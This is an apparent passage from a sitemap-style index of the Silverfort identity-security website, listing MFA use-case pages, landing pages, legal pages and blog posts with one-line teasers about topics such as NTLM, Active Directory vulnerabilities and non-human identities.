Desktop](https://www.silverfort.com/use-cases/mfa-for-desktop/): Simplify security with Silverfort: Robust MFA for Desktop and Cloud, no agents required. - [MFA for Office 365](https://www.silverfort.com/use-cases/mfa-for-office-365/): Fortifying Office 365’s Security: One Step at a Time with Silverfort’s MFA Solution. Silverfort provides a seamless and innovative solution... - [MFA for Teams](https://www.silverfort.com/use-cases/mfa-for-teams/): Multi-factor authentication made simple for stronger team security with Silverfort. Silverfort provides a breakthrough solution for Multi-Factor Authentication (MFA) for... - [MFA for Remote Access](https://www.silverfort.com/use-cases/mfa-for-remote-access/): Secure your remote access with Silverfort, the ultimate MFA solution. - [MFA for Root User](https://www.silverfort.com/use-cases/mfa-for-root-user/): Elevate your security with Silverfort MFA – the ultimate solution for Root User protection. - [MFA for Outlook](https://www.silverfort.com/use-cases/mfa-for-outlook/): Secure your Outlook with Silverfort MFA – the ultimate protection against unauthorized access. Silverfort is the perfect solution for businesses... - [MFA for Linux](https://www.silverfort.com/use-cases/mfa-for-linux/): Strong authentication and risk-based adaptive policies to secure access to all your Linux servers and applications - [MFA for VPN](https://www.silverfort.com/use-cases/mfa-for-vpn/): Safeguarding your VPN remote access with Agentless MFA. - [MFA for Forticlient VPN](https://www.silverfort.com/use-cases/mfa-for-forticlient-vpn/): Secure your VPN connections with ease – with Silverfort’s MFA for Forticlient VPN. - [MFA for Palo Alto VPN](https://www.silverfort.com/use-cases/mfa-for-palo-alto-vpn/): Uncompromising security for Palo Alto VPN with Silverfort’s seamless MFA solution. Silverfort provides a secure and seamless multi-factor authentication (MFA)... - [MFA for Meraki VPN](https://www.silverfort.com/use-cases/mfa-for-meraki-vpn/): Enforce MFA without requiring modifications to endpoints or servers for secure remote access. Silverfort’s solution for MFA for Meraki VPN... - [MFA for vCenter](https://www.silverfort.com/use-cases/mfa-for-vcenter/): Apply MFA. protection for vCenter with Silverfort’s Advanced Solution Silverfort is a cutting-edge cybersecurity solution that provides seamless multi-factor authentication... - [MFA for VMWare](https://www.silverfort.com/use-cases/mfa-for-vmware/): Revolutionizing MFA for VMWare: secure privileged access to vCenter, one authentication at a time. Silverfort is a cutting-edge cybersecurity solution... - [MFA for Juniper](https://www.silverfort.com/use-cases/mfa-for-juniper/): Secure access for the most complex networks with Silverfort’s cutting-edge MFA for Juniper. Silverfort is the next-generation solution for multi-factor... - [MFA for Jenkins](https://www.silverfort.com/use-cases/mfa-for-jenkins/): Secure your Jenkins with ease – Silverfort’s MFA solution has got you covered. Silverfort offers a revolutionary solution for implementing... - [MFA for Jira](https://www.silverfort.com/use-cases/mfa-for-jira/): Streamline Jira authentication with Silverfort’s MFA solution – safeguard your projects and productivity. - [MFA for Web Applications](https://www.silverfort.com/use-cases/mfa-for-web-applications/): Secure your web applications with ease – Silverfort’s MFA solution has you covered Silverfort is a cutting-edge cybersecurity solution that... - [MFA for Servers](https://www.silverfort.com/use-cases/mfa-for-servers/): Secure your servers with ease – give Silverfort’s MFA solution a breeze. Silverfort’s solution for Multi-Factor Authentication for Servers offers... - [MFA for VDI](https://www.silverfort.com/use-cases/mfa-for-vdi/): Secure your virtual world seamlessly with Silverfort’s MFA solution for VDI. Silverfort provides a unified MFA (multi-factor authentication) solution for... - [MFA for Network Devices](https://www.silverfort.com/use-cases/mfa-for-network-devices/): Secure your network devices with ease, using Silverfort’s MFA solution! Networking devices including routers, switches, and firewalls are attractive targets... - [MFA for B2B](https://www.silverfort.com/use-cases/mfa-for-b2b/): Implement secure access with Silverfort’s MFA solution – protecting your B2B network has never been easier. Silverfort offers a cutting-edge... - [MFA for Business](https://www.silverfort.com/use-cases/mfa-for-business/): Deploy secure authentication without compromise with Silverfort’s MFA solution for businesses. Silverfort is a powerful MFA (multi-factor authentication) solution for... - [MFA for User Interface Logins](https://www.silverfort.com/use-cases/mfa-for-user-interface-logins/): Securing your digital world with seamless MFA for every UI, powered by Silverfort. - [MFA for Healthcare](https://www.silverfort.com/use-cases/mfa-for-healthcare/): Protecting patient data with peace of mind – Silverfort’s seamless MFA solution for healthcare. Silverfort provides a powerful authentication platform... - [MFA for AWS Workspaces](https://www.silverfort.com/use-cases/mfa-for-aws-workspaces/): Secure AWS Workspaces with ease – Silverfort’s MFA solution has got you covered! Silverfort provides a revolutionary Multi-Factor Authentication (MFA)... - [Silverfort for Travelers customers](https://www.silverfort.com/silverfort-for-travelers-customers/): Welcome Travelers Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement... - [LP: Comply with the New Cyber Security Insurance Requirements – THN EM July 2023](https://www.silverfort.com/comply-with-the-new-cyber-ins-requirements-thn-em-jul23/): Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can... - [Microsoft Partner Page](https://www.silverfort.com/partners/microsoft/): Silverfort & Microsoft Silverfort and Microsoft’s product integrations help organizations to consolidate their IAM across hybrid environments, extend identity protection... - [LP: Silverfort for Alliant customers](https://www.silverfort.com/silverfort-for-alliant-customers/): Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our... - [LP: Silverfort for INSUREtrust customers](https://www.silverfort.com/silverfort-for-insuretrust-customers/): Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our... - [LP: The Dark Side of Ransomware Protection – PPC](https://www.silverfort.com/the-dark-side-of-ransomware-protection-ppc/): Can you block lateral movement? Ransomware attacks are a top concern for enterprise security stakeholders, particularly the pairing of ransomware... - [LP: Find a Partner LP](https://www.silverfort.com/find-a-partner/): We are all about matching you with the right partner. We’ll find your perfect match. Just complete a few questions,... - [Request a demo - DE](https://www.silverfort.com/request-a-demo-de/): What is your identity protection challenge? Fill out the form below and we’ll contact you to schedule an online or... - [Request a demo - FR](https://www.silverfort.com/request-a-demo-fr/): What is your identity protection challenge? Fill out the form below and we’ll contact you to schedule an online or... - [Request a Demo LP-MFA-AD-FR](https://www.silverfort.com/request-a-demo-lp-mfa-ad-fr/): Remplissez ce formulaire pour organiser une démonstration. Si vous avez un Active Directory, il est probable que de nombreuses authentifications... - [Silverfort for At-Bay Customers](https://www.silverfort.com/silverfort-for-at-bay-customers/): Welcome At-Bay Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement... - [LP: Comply with the New Cyber Security Insurance Requirements – PPC](https://www.silverfort.com/comply-with-the-new-cyber-insurance-requirements-ppc/): Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can... - [Silverfort for AIG customers](https://www.silverfort.com/silverfort-for-aig-clients/): Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our... - [LP: Re-Evaluate Your MFA: Are You as Protected as You Should Be?](https://www.silverfort.com/re-evaluate-your-mfa-are-you-as-protected-as-you-should-be/): Multi-factor Authentication (MFA) protection is a key component in any organization’s security stack, but ultimately, only as strong as its... - [LP: Case Study: Leading Manufacturer Averted Lateral Movement](https://www.silverfort.com/leading-manufacturer-averts-lateral-movement/): The manufacturing industry has become a ripe target for cyber-attacks over the last decade. Whether due to vulnerable hybrid environments,... - [LP: 4 Steps To Comprehensive Service Account Security – THN](https://www.silverfort.com/4-steps-to-comprehensive-service-account-security-thn/): There are countless service accounts in any given organization and today, the number of these non-human accounts, and the number... - [LP: Webinar on Demand - Can You Block Lateral Movement in Real Time?](https://www.silverfort.com/webinar-on-demand-can-you-block-lateral-movement-in-real-time/): https://www. youtube. com/watch? v=SgyVeXoG-cc - [LP: Cyber Insurance Free Assessment](https://www.silverfort.com/cyber-insurance-free-assessment/): GET A FREE IDENTITY SECURITY ASSESSMENT Identify the MFA and privileged access protection gaps you must resolve to qualify for... - [LP: Hybrid IAM Azure eBook LP DE](https://www.silverfort.com/lp-hybrid-iam-azure-ebook-de/): Gewinnen Sie gegen fortschrittliche Bedrohungsakteure mit umfassendem, ressourcenübergreifendem Zugriff mit geringsten Rechten. Identitätsbasierte Angriffe haben an Raffinesse und Umfang zugenommen.... - [LP: Cyber Insurance eBook LP DE](https://www.silverfort.com/lp-cyber-insurance-ebook-de/): Jeder kennt den Wert einer Cyberversicherung, aber es kann schwierig sein, mit den Anforderungen an die Cyberversicherung Schritt zu halten.... - [LP: 4-steps-to-comprehensive-service-account-security LP DE](https://www.silverfort.com/4-steps-to-comprehensive-service-account-security-lp-de/): In jedem Unternehmen gibt es unzählige Dienstkonten, und die Zahl dieser nicht-menschlichen Konten und der Anwendungen, die auf sie angewiesen... - [Request a Demo LP-MFA-FR](https://www.silverfort.com/request-a-demo-lp-mfa-fr/): Remplissez ce formulaire pour organiser une démonstration. Si vous avez un Active Directory, il est probable que de nombreuses authentifications... - [LP: hybrid IAM Azure eBook FR](https://www.silverfort.com/lp-hybrid-iam-consolidation-azure-ad-fr/): Gagnez contre les attaquants avec la mise en place sur les authentifications de l’AD d’un contrôle d’accès renforcé et généralisé... - [LP: 4-steps-to-comprehensive-service-account-security FR](https://www.silverfort.com/lp-4-steps-to-comprehensive-service-account-security-fr/): Les comptes de services sont désormais largement utilisés dans les entreprises. Le nombre d’applications qui en dépendent grandit de jour... - [Request a Demo LP-CI](https://www.silverfort.com/request-a-demo-lp-ci/): Fill out the form to schedule a demo. Need to apply MFA to privileged accounts or legacy applications to comply... - [Request a Demo LP-MFA](https://www.silverfort.com/request-a-demo-lp-mfa/): Fill out the form to schedule a demo. If you have MFA but your legacy apps, command line interfaces or... - [Thank you page - why unified iam visibility control is key for zero trust](https://www.silverfort.com/thank-you-page-why-unified-iam-visibility-control-is-key-for-zero-trust/) - [Thank You for Downloading Service Accounts Ebook](https://www.silverfort.com/thank-you-for-downloading-service-accounts-ebook/) - [Thank You For Downloading Re Evaluate Your Mfa Protection Ebook](https://www.silverfort.com/thank-you-for-downloading-re-evaluate-your-mfa-protection-ebook/) - [Thank You For Downloading Rethinking Ransomware Protection Ebook](https://www.silverfort.com/thank-you-for-downloading-rethinking-ransomware-protection-ebook/) - [Thank You For Downloading Silverfort Adaptive Authentication White Paper](https://www.silverfort.com/thank-you-for-downloading-silverfort-adaptive-authentication-white-paper/) - [Thank You For Downloading Protecting The Unprotectable White Paper](https://www.silverfort.com/thank-you-for-downloading-protecting-the-unprotectable-white-paper/) - [Thank you page - mfa meet the ultimate game changer in ransomware protection](https://www.silverfort.com/thank-you-page-mfa-meet-the-ultimate-game-changer-in-ransomware-protection/) - [Thank you page - journey to identity centric zero trust security wod](https://www.silverfort.com/thank-you-page-journey-to-identity-centric-zero-trust-security-wod/) - [Request a Demo LP](https://www.silverfort.com/request-a-demo-lp/): Fill out the form to schedule a demo. Here’s what happens when you speak with us: - [LEGAL: Cookies Policy](https://www.silverfort.com/company/cookies-policy/): We use cookies and similar files or technologies to automatically collect and store information about your computer, device, and Site... - [LEGAL: Silverfort Product License Agreement](https://www.silverfort.com/company/silverfort-software-license-agreement-01-21/): BY INSTALLING, ACCESSING AND/OR USING THE SILVERFORT AUTHENTICATION PLATFORM SOFTWARE (“SOFTWARE”), YOU EXPRESSLY ACKNOWLEDGE AND AGREE THAT YOU, OR THE... - [Enrolling Users](https://www.silverfort.com/enrolling-users/): Installing Silverfort Mobile App Configuring Silverfort Mobile App Once you have installed the mobile app, you need to configure it... - [Logo.png(170x38)](https://www.silverfort.com/logo-png/) - [USE CASE: Cyber Insurance Compliance](https://www.silverfort.com/use-cases/cyber-insurance-compliance/): Cyber insurance compliance Coverage is complete. Compliance is built in. Meet and exceed the extended MFA requirements of cyber insurance... - [USE CASE: Zero Trust Security](https://www.silverfort.com/use-cases/zero-trust-security/): Identity Zero Trust Trust made easy. Bring zero trust security to the identity control plane with adaptive least-privilege access policies... - [CAPABILITIES: Universal MFA](https://www.silverfort.com/platform/universal-multi-factor-authentication/): Universal Multi-Factor Authentication Push MFA beyond limits. Protect everything. When we say universal, we mean it. Extend MFA protection to... - [USE CASE: Ransomware Protection](https://www.silverfort.com/use-cases/ransomware-protection/): Lateral movement & ransomware protection Stop attacks from spreading in real time. Defend against ransomware attacks and put a stop... - [LEGAL: Terms of Use](https://www.silverfort.com/terms-of-use/): Welcome to www. silverfort. com (together with its subdomains, Content, Marks and services, the “Site”). Please read the following Terms... - [LEGAL: Data Privacy Framework ("DPF") Program Notice](https://www.silverfort.com/silverfort-dpf-notice/): Effective: September, 2024 This DPF notice (“Notice”) governs Silverfort Inc. (“Silverfort”, “We” or “Our”) participation in the EU-U. S. DPF... - [Careers](https://www.silverfort.com/careers/): Careers with Silverfort Join our team. We’re always looking for the best talent to join our award-winning team. Discover what... - [Contact us](https://www.silverfort.com/contact/): contact us Let’s connect We’re here to help. Talk to sales Looking for a complete end-to-end identity security solution? You’ve... - [Use Cases](https://www.silverfort.com/use-cases/) - [OLD USE CASE: Service Account Protection](https://www.silverfort.com/use-cases/securing-service-accounts/): Discover, monitor and protect service accounts (M2M access) with fully automated visibility, risk analysis and adaptive Zero Trust policies, without... - [Request a demo](https://www.silverfort.com/request-a-demo/): Secure every identity. Stop identity threats—inline. We found a way. From legacy to cloud, discover and protect every identity. See... - [Blog](https://www.silverfort.com/blog/) - [About Us](https://www.silverfort.com/company/): About Us Taking identity security where it has never gone before. Silverfort secures every dimension of identity. We break down... - [Partner with Silverfort](https://www.silverfort.com/partners/): Partner with Silverfort Partnerships are key to our continued success and growth. Our partner network includes leading value-added distributors and... - [Platform](https://www.silverfort.com/platform/): The Silverfort Identity Security Platform Secure every dimension of identity. Leave no one behind. Protect workforce users, privileged users, third... --- ## Posts - [The future of privileged access is vault-free](https://www.silverfort.com/blog/the-future-of-privileged-access-is-vault-free/): The cybersecurity world was jolted by the recent announcement that Palo Alto Networks will acquire CyberArk in a landmark deal... - [ESG research uncovers 70% of enterprises recognize the need to consolidate their identity security tool stack](https://www.silverfort.com/blog/esg-research-reveals-importance-of-identity-security-consolidation/): Read the latest identity security research from Enterprise Strategy Group (ESG), unveiling key trends and investment plans. - [Stopping Golden dMSA attacks before they start](https://www.silverfort.com/blog/stopping-golden-dmsa-attacks-before-they-start/): Microsoft’s recent research spotlights a dangerous post-exploitation technique called Golden dMSA. This new attack method abuses SYSTEM-level access on domain... - [Into the Spider-verse: Qantas, Scattered Spider, and what Australian teams should learn](https://www.silverfort.com/blog/into-the-spider-verse-qantas-scattered-spider-and-what-australian-teams-should-learn/): As both a Qantas Frequent Flyer and a cybersecurity professional based in Sydney, I felt the impact of the airline’s... - [What the future holds for identity security after CyberArk's acquisition by Palo Alto Networks](https://www.silverfort.com/blog/what-the-future-holds-for-identity-security-after-cyberarks-acquisition-by-palo-alto-networks/): Last week, Palo Alto Networks announced its intention to acquire CyberArk for $25B. This is Palo Alto Networks’ first move... - [Service Accounts: From Security Measure to Silent Foothold](https://www.silverfort.com/blog/service-accounts-from-security-measure-to-silent-foothold/): Microsoft’s built-in password rotation mechanism is designed to protect on-premises Non-Human Identities (NHIs), such as machine accounts in Active Directory... - [Introducing the Silverfort MCP Server: Where AI Agents Meet Identity Security](https://www.silverfort.com/blog/introducing-the-silverfort-mcp-server-where-ai-agents-meet-identity-security/): The future of identity-aware AI starts now AI agents are becoming integral to enterprise workflows, from analyzing risk to making... - [How to mitigate active exploitation of Microsoft SharePoint vulnerabilities](https://www.silverfort.com/blog/how-to-mitigate-active-exploitation-of-microsoft-sharepoint-vulnerabilities/): A recent Microsoft security blog post highlights active exploitation of on-premises SharePoint vulnerabilities, where attackers are: Patching isn’t always immediate—so... - [6 capabilities every identity security platform must have ](https://www.silverfort.com/blog/six-capabilities-every-identity-security-platform-must-have/): Identity has changed – in a world where business occurs across systems, time zones, and even between humans and non-humans,... - [What’s the difference between NHI and AI agents—and why it matters ](https://www.silverfort.com/blog/whats-the-difference-between-nhi-and-ai-agents-and-why-it-matters/): As AI capabilities evolve, the concepts of non-human identity (NHI) and AI agent are showing up increasingly in our daily... - [Non-human identities and zero trust: The next evolution in identity security](https://www.silverfort.com/blog/non-human-identities-and-zero-trust-the-next-evolution-in-identity-security/): As enterprises push forward with digital transformation, a new and often overlooked attack surface has emerged: non-human identities (NHIs). NHIs... - [NOTLogon: How a Low-Privilege Machine Can DoS Your Domain](https://www.silverfort.com/blog/notlogon-how-a-low-privilege-machine-can-dos-your-domain/): Silverfort discovers Active Directory Denial-of-Service (DoS) vulnerability, known as NOTLogon (CVE-2025-47978) - [Introducing AI Agent Security: Treat your AI agents as identities for accountability, inline protection, and accelerated innovation ](https://www.silverfort.com/blog/secure-your-ai-agents-with-silverforts-identity-first-innovation/): As organizations hurry to embrace AI and its many benefits, one challenge weighs heavily on CISO and security teams’ minds:... - [Silverfort Is Now the Only IMDA-Accredited Identity Security & Threat Detection Platform for Cloud and On-Prem](https://www.silverfort.com/blog/silverfort-is-now-the-only-imda-accredited-identity-security-platform-for-cloud-and-on-prem/): With the acquisition of Rezonate’s cloud-native capabilities and the launch of the new cloud NHI security capabilities, Silverfort is now... - [Fireside Chat with Silverfort President and Chief Revenue Officer Howard Greenfield ](https://www.silverfort.com/blog/fireside-chat-with-president-and-cro-howard-greenfield/): Cybersecurity and identity industry veteran Howard Greenfield joins Silverfort as President & CRO. - [What you don’t know about your identities could be your biggest risk?](https://www.silverfort.com/blog/what-you-dont-know-about-your-identities-could-be-your-biggest-risk/): Have you ever considered that your biggest security risk might come from an account no one remembers exists? Identity has... - [Beyond the hype: The hidden security risks of AI agents and MCP ](https://www.silverfort.com/blog/beyond-the-hype-the-hidden-security-risks-of-ai-agents-and-mcp/): As AI rapidly evolves from a novelty to a necessity, businesses across every industry are feeling the pressure to integrate... - [Insecurity in the shadows: The data that proves why non-human identities are a cybersecurity priority ](https://www.silverfort.com/blog/insecurity-in-the-shadows-the-data-that-proves-why-non-human-identities-are-a-cybersecurity-priority/): Most security programs are laser-focused on human users, including employees, contractors, and third parties. But there’s a parallel universe growing... - [Loss control services: One of the most underused tools for reducing identity security risk ](https://www.silverfort.com/blog/loss-control-services-one-of-the-most-underused-tools-for-reducing-identity-security-risk/): Cyber insurers are offering tools that could significantly reduce your identity risk—but most organizations aren’t using them. One of the... - [Defending retail against identity threats: What you can do today ](https://www.silverfort.com/blog/defending-retail-against-identity-threats-what-you-can-do-today/): In recent weeks, several major UK retail brands, including M&S, Harrods, and the Co-operative Group, have recently suffered significant cyberattacks... - [Uncovering the hidden threat: Securing cloud non-human identities with Silverfort](https://www.silverfort.com/blog/uncovering-the-hidden-threat-securing-cloud-non-human-identities-with-silverfort/): As innovation in identity security evolves by the day, so does the attack surface. Nothing is growing faster than cloud-based... - [The silent explosion of non-human identities: The need for an end-to-end approach ](https://www.silverfort.com/blog/introducing-non-human-identity-security-nhi/): Today, Silverfort expands its deep identity protection to the cloud—bringing unmatched visibility and control to non-human identities (NHIs) across cloud... - [Enforcing MFA for Windows Logon: Local endpoints, virtual desktops and servers ](https://www.silverfort.com/blog/enforcing-mfa-for-windows-logon-local-endpoints-virtual-desktops-and-servers/): Do you know how many Windows Logon authentications happen on a daily basis? Hundreds of thousands of employees globally use... - [The inevitable decline of traditional PAM ](https://www.silverfort.com/blog/the-inevitable-decline-of-traditional-pam/): Traditional PAM solutions have dominated the market for years—but the truth is, you probably don’t need one to cover the... - [Reflections from the identity frontline  ](https://www.silverfort.com/blog/reflections-from-the-identity-frontline/): Over the last eight years, I’ve had the unique challenge of building and maturing an Identity and Access Management (IAM)... - ["It's the identity, stupid": A conversation with identity security expert Abbas Kudrati ](https://www.silverfort.com/blog/its-the-identity-stupid-a-conversation-with-identity-security-expert-abbas-kudrati/): I sat down with Abbas Kudrati, APAC Chief Identity Security Advisor at Silverfort, to discuss the most pressing identity security... - [Who governs the governance? Why the least privilege model is key to securing IGA ](https://www.silverfort.com/blog/who-governs-the-governance-why-the-least-privilege-model-is-key-to-securing-iga/): IGA tools allow organizations to manage who has access to what. IGA’s primary focus is on business outcomes and operational... - [Silverfort named a Fast Company Most Innovative Company ](https://www.silverfort.com/blog/silverfort-named-a-fast-company-most-innovative-company/): The World’s Most Innovative Companies Award by Fast Company is the definitive source for recognizing organizations that transform industries and... - [Local accounts unlocked: how Silverfort empowers security teams with end-to-end visibility](https://www.silverfort.com/blog/local-accounts-unlocked-how-silverfort-empowers-security-teams-with-end-to-end-visibility/): Have you ever thought how many accounts in your environment operate outside of your visibility and control? One of the... - [How PAS and PAM Work Together to Protect Privileged Admin Accounts](https://www.silverfort.com/blog/how-pas-and-pam-work-together-to-protect-privileged-admin-credentials/): Admin accounts are undoubtedly the ultimate prize for attackers when it comes to privileged users. These accounts are the most... - [Unveiling Silverfort’s New Brand—Identity Security Done Right](https://www.silverfort.com/blog/unveiling-silverforts-new-brand-identity-security-done-right/): No more patchworks and one-offs—break down the traditional identity silos and secure without limits. - [Identity security explained in the Belgian NIS2 law](https://www.silverfort.com/blog/identity-security-explained-in-the-belgian-nis2-law/): Belgium was the first European country to transpose NIS2 into national law, in April, through its “NIS2 law”. This set... - [A Critical Step Forward for Healthcare: Breaking Down the Proposed HIPAA Security Rule Framework Updates ](https://www.silverfort.com/blog/a-critical-step-forward-for-healthcare-breaking-down-the-proposed-hipaa-security-rule-framework-updates/): Healthcare is one of the most targeted sectors by malicious actors, with the number of breaches growing consistently year on... - [Microsoft Teams and Silverfort: Bridging Authentication and Enhancing Identity Incident Visibility](https://www.silverfort.com/blog/microsoft-teams-and-silverfort-bridging-authentication-and-enhancing-identity-incident-visibility/): While hybrid environments are the new norm, they bring with them a unique set of security challenges, like fragmented systems,... - [Navigating the Five Eyes Alliance's Guide to Detecting and Mitigating Active Directory Compromises](https://www.silverfort.com/blog/navigating-the-five-eyes-alliances-guide-to-detecting-and-mitigating-active-directory-compromises/): The Five Eyes Alliance, led by the Australian Signals Directorate (ASD), recently released a key document titled Detecting and Mitigating... - [If you think you blocked NTLMv1 in your org, think again](https://www.silverfort.com/blog/ntlmv1-bypass-in-active-directory-technical-deep-dive/): Silverfort discovers an Active Directory Group Policy designed to disable NTLMv1 is easily bypassed due to a simple misconfiguration, allowing... - [The Treasury Department cyberattack: Key insights on BeyondTrust remote support software hack ](https://www.silverfort.com/blog/the-treasury-department-cyberattack-key-insights-on-beyondtrust-remote-support-software-hack/): TL;DR *** In December 2024, the U. S. Department of the Treasury fell victim to a sophisticated cyberattack orchestrated by... - [Introducing the Silverfort Integration Hub: A New Era for Hybrid and Cloud Identity Security](https://www.silverfort.com/blog/introducing-the-silverfort-integration-hub-a-new-era-for-hybrid-and-cloud-identity-security/): Silverfort is excited to announce the launch of our Integration Hub, a Silverfort cloud service that seamlessly connects your Silverfort... - [Secure your Privileged Accounts with Silverfort  ](https://www.silverfort.com/blog/secure-your-privileged-accounts-with-silverfort/): Due to the distinct security blindspots associated with PAM solutions, protecting privileged accounts has become a daunting task for most... - [Privileged access security reimagined: What did we aim for with our new product?](https://www.silverfort.com/blog/silverfort-launches-privileged-access-security-to-solve-gaps-left-by-pam/): Today we’re proud to introduce another important milestone in Silverfort’s journey to build the world’s leading unified identity security platform.... - [How FIDO2 Enhances Identity Security for Shift-Based Shared Accounts in Retail and Manufacturing](https://www.silverfort.com/blog/how-fido2-enhances-identity-security-for-shift-based-shared-accounts-in-retail-and-manufacturing/): In industries that require shift-based workforce, like retail and manufacturing, sharing user accounts are a common solution for employees who... - [Enhancing Cyber Security with Silverfort: Addressing Key Insights from the ASD ACSC Annual Cyber Threat Report 2023-2024 ](https://www.silverfort.com/blog/enhancing-cyber-security-with-silverfort-addressing-key-insights-from-the-asd-acsc-annual-cyber-threat-report-2023-2024/): Over the past year, the Australian Cyber Security Centre (ACSC) received nearly 90,000 cybercrime reports and more than 36,700 calls... - [Do you have all the identity security signals and controls to make SSF/CAEP work? ](https://www.silverfort.com/blog/do-you-have-all-the-identity-security-signals-and-controls-to-make-ssf-caep-work/): Every day, your Active Directory processes millions of authentication requests, permission changes and access events. Hidden within this flood of... - [Rezonate is now part of Silverfort: Building the world’s first end-to-end identity security platform  ](https://www.silverfort.com/blog/silverfort-acquires-rezonate-cloud-identity-security/): We’re excited to welcome Rezonate to the Silverfort team, expanding our identity security platform deeper into cloud environments and breaking... - [New Cybersecurity Regulations in New York: What General Hospitals Must Do to Stay Compliant ](https://www.silverfort.com/blog/new-cybersecurity-regulations-in-new-york-what-general-hospitals-must-do-to-stay-compliant/): Every general hospital in New York State is now experiencing a significant shift in their cybersecurity requirements. As of October... - [Exploiting Weaknesses in Entra ID Account Synchronization to Compromise the On-Prem Environment  ](https://www.silverfort.com/blog/exploiting-weaknesses-in-entra-id-account-synchronization-to-compromise-the-on-prem-environment/): Active Directory (AD) is a Microsoft product designed to assist network administrators in managing user permissions within an organization. It... - [Identity Under Siege: Why Attackers Are Targeting MFA Gaps and How to Respond](https://www.silverfort.com/blog/identity-under-siege-why-attackers-are-targeting-mfa-gaps-and-how-to-respond/): Cyberattacks are becoming more frequent and sophisticated, with identity as the main target for threat actors and ransomware as a... - [Navigating CMMC Compliance: How Silverfort Can Streamline Your Journey](https://www.silverfort.com/blog/navigating-cmmc-compliance-how-silverfort-can-streamline-your-journey/): As the threat landscape evolves, attackers are setting their sights on organizations that work closely with critical national infrastructure and... - [ITDR and ISPM: The Best of Both Worlds](https://www.silverfort.com/blog/itdr-and-ispm-the-best-of-both-worlds/): At first glance, Identity Threat Detection and Response (ITDR) and Identity Security Posture Management (ISPM) sound like two names for... - [Hidden Threats: Why Privileged Access Security Should Be Your Top Priority ](https://www.silverfort.com/blog/hidden-threats-why-privileged-access-security-should-be-your-top-priority/): It’s no secret that privileged accounts can be an open door to security threats. Yet managing privileged access––not protecting the... - [Introducing Silverfort's Identity-First Incident Response: Block Lateral Movement, Detect Compromised Accounts and Accelerate Recovery ](https://www.silverfort.com/blog/introducing-silverforts-identity-first-incident-response-block-lateral-movement-detect-compromised-accounts-and-accelerate-recovery/): Today I’m excited to announce Silverfort’s Identity-First Incident Response (IR) Solution, which flips the script on the traditional IR process... - [Comment sécuriser les « processus automatiques » selon la transposition française de NIS2 ?](https://www.silverfort.com/blog/comment-securiser-les-processus-automatiques-selon-la-transposition-francaise-de-nis2/): Le référentiel de l’ANSSI publié par le MagIT pour les entités assujetties à la directive NIS2 en France mentionne à... - [Service Account Security: Why Automation is the Key to Effective Enforcement ](https://www.silverfort.com/blog/service-account-security-why-automation-is-the-key-to-effective-enforcement/): Cybersecurity starts with one major principle: “You cannot protect what you don’t know”. This is true for assets like endpoints,... - [How Organizations Can Align with NIST’s Cybersecurity Framework Version 2.0](https://www.silverfort.com/blog/how-silverfort-can-help-organizations-align-with-nists-cybersecurity-framework-version-2-0/): Applying security controls across an organization’s environment must be a top priority for every organization, regardless of its size, sector,... - [Keeping Up with the Credentials: The Evolving Landscape of Ransomware in 2024](https://www.silverfort.com/blog/keeping-up-with-the-credentials-the-evolving-landscape-of-ransomware-in-2024/): The first half of 2024 has seen some of the largest breaches in recent years. Their common denominator? Compromised credentials... - [The End of an Era: Understanding the Security Risks of NTLM](https://www.silverfort.com/blog/understanding-the-security-risks-of-ntlm/): In October 2023, Microsoft made a pivotal announcement that signaled the beginning of the end for NTLM, including all its... - [Shining the Spotlight on the Rising Risks of Non-Human Identities](https://www.silverfort.com/blog/shining-the-spotlight-on-the-rising-risks-of-non-human-identities/): Active Directory Service Accounts: A closer look at one of the most common NHIs and their role in lateral movement... - [NTLM Deprecation is Giving Us XP EOL Flashbacks: Are You Protected? ](https://www.silverfort.com/blog/ntlm-deprecation-is-giving-us-xp-eol-flashbacks-are-you-protected/): Microsoft recently announced the deprecation of NTLM protocol for Windows client. This falls in line with Microsoft’s encouragement to move... - [Identity Security Is the Key to Managing Manufacturers’ Supply Chain Cyber Risk ](https://www.silverfort.com/blog/identity-security-is-the-key-to-managing-manufacturers-supply-chain-cyber-risk/): What’s the weakest link in a manufacturer’s security architecture? One of the common answers is ‘the one you can’t control’,... - [Knowledge is Power: The Importance of Identity Risk Assessment](https://www.silverfort.com/blog/knowledge-is-power-the-importance-of-identity-risk-assessment/): Over 80% of organizations have experienced an identity-related breach that involved compromised credentials. Compromised credentials are one of the most... - [Transposition française de la directive NIS2 – en matière d’identité, quelles sont les mesures attendues?](https://www.silverfort.com/blog/french-transposition-of-the-nis2-directive/): L’ANSSI travaille depuis plusieurs mois sur la transposition de la directive européenne NIS2 en droit français. Récemment, une première ébauche... - [AD Tiering: Protecting Admin Access to Tiers 1 and 2 ](https://www.silverfort.com/blog/ad-tiering-protecting-admin-access-to-tiers-1-and-2/): As the identity attack surface continues to evolve with new methods of compromising organizations, the need to secure an organization’s... - [AD Tiering Made Simple(r)](https://www.silverfort.com/blog/ad-tiering-made-simpler/): Active Directory (AD) tiering is nothing new for organizations that need the most secure IT environments, like those in the... - [Beyond Passwords: Why Trusting Password Hygiene Isn't Enough](https://www.silverfort.com/blog/beyond-passwords-why-trusting-password-hygiene-isnt-enough/): Let’s discuss passwords and identity security. By entering a password that only you know, you are in theory “proving” to... - [Treating Identity Security as a Business Investment](https://www.silverfort.com/blog/treating-identity-security-as-a-business-investment/): Security decisions directly affect employees, customers, shareholders, and business continuity. As the role of the Chief Information Security Officer (CISO)... - [Navigating Retail: Overcoming the Top 3 Identity Security Challenges](https://www.silverfort.com/blog/navigating-retail-overcoming-the-top-identity-security-challenges/): As retailers compete in an increasingly competitive marketplace, they invest a great deal of resources in becoming household names. But... - [Unlocking HIPAA Compliance: Navigating Access Control and MFA Guidelines](https://www.silverfort.com/blog/unlocking-hipaa-compliance-navigating-access-control-and-mfa-guidelines/): As technology continues to revolutionize healthcare operations, protecting patient data has never been more challenging. In the ongoing struggle against... - [Identity Security for Oil and Gas Environments  ](https://www.silverfort.com/blog/identity-security-for-oil-and-gas/): Identity-based threats account for a staggering 80% of breaches, positioning identity security as the foundational element of cybersecurity in the... - [MFA Requirements for Elevated Access Controls 